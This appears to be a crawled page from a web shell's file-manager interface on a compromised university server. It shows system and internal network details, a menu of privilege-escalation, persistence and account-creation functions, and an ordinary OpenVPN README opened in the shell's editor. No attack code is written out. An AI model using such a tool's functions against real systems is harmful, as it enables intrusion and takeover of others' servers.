Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
openvpn /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
AUTHORS
28
B
-rw-r--r--
changelog.Debian.gz
2.19
KB
-rw-r--r--
Changes.rst.gz
18.4
KB
-rw-r--r--
copyright
12.99
KB
-rw-r--r--
COPYRIGHT.GPL.gz
6.64
KB
-rw-r--r--
gui-notes.txt.gz
3.73
KB
-rw-r--r--
management-notes.txt.gz
14.62
KB
-rw-r--r--
NEWS.Debian.gz
1.84
KB
-rw-r--r--
openvpn.8.html
347.3
KB
-rw-r--r--
openvpn-examples.5.html
18
KB
-rw-r--r--
PORTS
3.75
KB
-rw-r--r--
README
2.12
KB
-rw-r--r--
README.auth-pam
3.97
KB
-rw-r--r--
README.Debian.gz
3.76
KB
-rw-r--r--
README.down-root
880
B
-rw-r--r--
README.IPv6
1.79
KB
-rw-r--r--
README.mbedtls
788
B
-rw-r--r--
README.systemd
2.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.down-root
down-root -- an OpenVPN Plugin Module SYNOPSIS The down-root module allows an OpenVPN configuration to call a down script with root privileges, even when privileges have been dropped using --user/--group/--chroot. This module uses a split privilege execution model which will fork() before OpenVPN drops root privileges, at the point where the --up script is usually called. The module will then remain in a wait state until it receives a message from OpenVPN via pipe to execute the down script. Thus, the down script will be run in the same execution environment as the up script. BUILD Build this module with the "make" command. The plugin module will be named openvpn-plugin-down-root.so USAGE To use this module, add to your OpenVPN config file: plugin openvpn-plugin-down-root.so "command ..." CAVEATS This module will only work on *nix systems, not Windows.
Close